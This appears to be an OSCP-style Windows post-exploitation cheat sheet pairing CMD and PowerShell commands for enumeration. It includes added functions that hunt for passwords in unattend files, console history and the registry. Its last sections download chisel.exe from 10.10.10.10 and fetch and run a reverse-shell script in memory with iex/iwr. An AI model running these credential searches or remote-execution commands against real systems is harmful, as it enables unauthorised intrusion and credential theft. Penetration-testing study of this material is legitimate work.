# Commands

* To understand how PowerShell works and how its commands are formed, see

{% content-ref url="powershell" %}
[powershell](https://dhaneshsivasamy07.gitbook.io/oscp-2022/windows-post-exploitation/notes/powershell)
{% endcontent-ref %}

* Commands used in post exploitation, with CMD and PowerShell variants:

```
C: command for cmd
P: command for powershell
```

* System information

```bash
C: systeminfo
P: Get-ComputerInfo
```

* Grep

```bash
C: findstr
P: Select-String -Pattern "OS:"
```

* Piping

```bash
|
C: systeminfo | findstr "OS"
P: cat test.txt | Select-String -Pattern "OS"
```

* User name

```bash
C: whoami [or] echo %username%
P: $env:UserName  
```

* Machine name

```bash
C: hostname
P: $env:COMPUTERNAME [or] $env:USERDOMAIN
```

* Users

```bash
C: net user [or] net user /domain
P: Get-LocalUser
```

* Information about the user

```bash
C: net user dnoscp
P: Get-LocalUser dnoscp
```

* Groups

```bash
C: net localgroup [or] net localgroup /domain
P: Get-LocalGroup
```

* Get Group members

```bash
C: net localgroup Administrators
P: Get-LocalGroupMember Administrators
```

* Get the network adapters

```bash
C: ipconfig [or] ipconfig /all
P: Get-NetAdapter
```

* Routing Table information

```bash
C: route print
P: Get-NetRoute
```

* Open ports

```bash
C: netstat -ano -p TCP [or] netstat -ano -p UDP
P: Get-NetTCPConnection
```
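`netstat -ano` prints the owning PID next to each socket, and `Get-NetTCPConnection` exposes the same value as `OwningProcess`. The function below, an added example and not part of the original cheat sheet, joins that PID to `Get-Process` and to `Win32_Service` so that each listening TCP port and bound UDP endpoint is shown with its process name, image path and, for `svchost.exe`, the service names it hosts. It assumes the NetTCPIP module (Windows 8 / Server 2012 or later); `Path` is empty for processes owned by other users unless you run it elevated.

```powershell
# Added example: map listening TCP ports and bound UDP endpoints to their owning process.
# Assumes the NetTCPIP module (Get-NetTCPConnection / Get-NetUDPEndpoint are available).
function Get-ListeningPortMap {
    [CmdletBinding()]
    param()

    # PID -> Process object, so each socket can be labelled without a second lookup.
    $procs = @{}
    Get-Process | ForEach-Object { $procs[$_.Id] = $_ }

    # PID -> service names; Win32_Service carries the ProcessId of every running service,
    # which is what lets a bare "svchost" be named (the same data as `tasklist /svc`).
    $svcs = @{}
    Get-CimInstance -ClassName Win32_Service -ErrorAction SilentlyContinue |
        Where-Object { $_.ProcessId -ne 0 } |
        ForEach-Object {
            $id = [int]$_.ProcessId
            if (-not $svcs.ContainsKey($id)) { $svcs[$id] = @() }
            $svcs[$id] += $_.Name
        }

    # Helper that builds one output row for a TCP connection or UDP endpoint.
    $toRow = {
        param($Proto, $Sock)
        $id = [int]$Sock.OwningProcess
        $p  = $procs[$id]
        [PSCustomObject]@{
            Proto        = $Proto
            LocalAddress = $Sock.LocalAddress
            LocalPort    = $Sock.LocalPort
            PID          = $id
            Process      = if ($p) { $p.ProcessName } else { '<unknown>' }
            Path         = if ($p) { $p.Path } else { $null }   # $null when access is denied
            Services     = if ($svcs.ContainsKey($id)) { $svcs[$id] -join ',' } else { '' }
        }
    }

    # Only sockets in the LISTEN state matter for "open ports"; UDP has no state, so every
    # bound endpoint is reported.
    Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
        ForEach-Object { & $toRow 'TCP' $_ }
    Get-NetUDPEndpoint -ErrorAction SilentlyContinue |
        ForEach-Object { & $toRow 'UDP' $_ }
}

Get-ListeningPortMap | Sort-Object Proto, LocalPort | Format-Table -AutoSize
```

Ports bound only to `127.0.0.1` or `::1` are worth a second look: they are invisible from the outside but reachable once you have a foothold, and often belong to services that never expected a hostile client.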

* Scheduled Jobs

```bash
C: schtasks
P: Get-ScheduledTask
```

* Running Process

```bash
C: tasklist /svc
P: Get-Process
```

* Starting a service

```bash
C: net start Themes
P: Start-Service -Name Themes
```

* Installed Drivers

```bash
C: driverquery
P: Get-WindowsDriver -Online -All
```

* Installed updates (hotfixes) and when they were applied

```bash
C: wmic qfe get Caption, Description, InstalledOn, HotFixID
P: Get-HotFix [or] (New-Object -ComObject "Microsoft.Update.AutoUpdate").Results | fl
```

* Juicy files location

```bash
C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
C:\Users\userName\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
```

* Find files

```bash
C: dir /s /b *.txt *.xml
P: Get-ChildItem -Path . -Include *.txt,*.xml -Recurse -File -Force -ErrorAction 'SilentlyContinue'
```

* Search for a string in a file

```bash
C: findstr /si password *.txt *.xml
P: Get-ChildItem -Path . -Include *.txt,*.xml -Recurse -File -ErrorAction SilentlyContinue | Select-String "password"
```

* Search the registry for passwords

```bash
reg query HKLM /f "password" /t REG_SZ /s
reg query HKCU /f "password" /t REG_SZ /s
```
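The three searches above (known juicy files, file contents, registry) are usually run together on every new host. The function below is an added example, not code from the original page: it checks the well-known unattend/sysprep locations, collects every profile's PSReadLine history, greps text-like files under a root, and walks the registry hives for value names or data containing the pattern, returning one object per hit so the results can be sorted or exported. The default root, extension list and hive list are assumptions; widen or narrow them per engagement.

```powershell
# Added example: one pass for credential hints in known files, file contents and the registry.
# $Root, $Extensions and $Hives are assumed defaults, not values from the original page.
function Find-CredentialHints {
    param(
        [string]$Root = 'C:\Users',
        [string]$Pattern = 'password',
        [string[]]$Extensions = @('*.txt', '*.xml', '*.ini', '*.config', '*.ps1', '*.bat'),
        [string[]]$Hives = @('HKLM:\SOFTWARE', 'HKCU:\')
    )
    $hits = New-Object System.Collections.Generic.List[object]

    # 1. Well-known files: unattended-install answer files and every user's PowerShell history.
    $known = @(
        'C:\sysprep.inf',
        'C:\sysprep\sysprep.xml',
        "$env:WINDIR\Panther\Unattend\Unattended.xml",
        "$env:WINDIR\Panther\Unattended.xml"
    )
    $historyGlob = "$env:SystemDrive\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt"
    foreach ($h in Get-ChildItem -Path $historyGlob -ErrorAction SilentlyContinue) {
        $known += $h.FullName
    }
    foreach ($f in $known) {
        if (Test-Path -LiteralPath $f) {
            $hits.Add([PSCustomObject]@{ Source = 'KnownFile'; Location = $f; Match = '(file present)' })
        }
    }

    # 2. Content search. -Include only filters when combined with -Recurse; -Force includes
    #    hidden files; SilentlyContinue swallows access-denied noise from other profiles.
    Get-ChildItem -Path $Root -Include $Extensions -Recurse -File -Force -ErrorAction SilentlyContinue |
        Select-String -Pattern $Pattern -SimpleMatch -ErrorAction SilentlyContinue |
        ForEach-Object {
            $hits.Add([PSCustomObject]@{
                Source   = 'FileContent'
                Location = "$($_.Path):$($_.LineNumber)"
                Match    = $_.Line.Trim()
            })
        }

    # 3. Registry: like `reg query /f <pattern> /s`, match on value name or string data.
    #    -like is case-insensitive by default, so "Password" and "PASSWORD" both hit.
    foreach ($hive in $Hives) {
        Get-ChildItem -Path $hive -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            $key = $_
            foreach ($name in $key.GetValueNames()) {
                $data = [string]$key.GetValue($name)
                if ($name -like "*$Pattern*" -or $data -like "*$Pattern*") {
                    $hits.Add([PSCustomObject]@{
                        Source   = 'Registry'
                        Location = "$($key.Name)\$name"
                        Match    = $data
                    })
                }
            }
        }
    }
    return $hits
}

Find-CredentialHints | Sort-Object Source, Location | Format-Table -AutoSize -Wrap
```

Expect false positives from setup logs and help text; the value of the combined pass is that it surfaces the unattend files and console history (which often hold plaintext credentials) in the same listing as the string hits, so nothing is missed because one of the three searches was skipped.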

* Running Services

```bash
C: sc query
P: Get-Service [or] Get-Service | ? {$_.Status -eq "Running"}
```

* Information about a specific service

```bash
C: sc query "Spooler"
P: Get-Service "Spooler"
```

* Copy a file

```bash
C: copy source_location destination
P: Copy-Item source_location -Destination destination
```

* Move a file

```bash
C: move source_location destination
P: Move-Item source_location -Destination destination
```

* Download a file

```bash
C: certutil -urlcache -split -f http://10.10.10.10/chisel.exe chisel.exe
P: Invoke-WebRequest -Uri http://10.10.10.10/chisel.exe -OutFile chisel.exe
P: (New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/chisel.exe", "chisel.exe")
```

* Execute PowerShell scripts directly in memory (nothing written to disk)

```bash
P: Invoke-Expression(Invoke-WebRequest -Uri "http://10.10.10.10/PowerShellReverseTCP.ps1" -UseBasicParsing)

# Same command using the built-in aliases (iex = Invoke-Expression, iwr = Invoke-WebRequest)
P: iex(iwr -uri "http://10.10.10.10/PowerShellReverseTCP.ps1" -usebasicparsing)
```
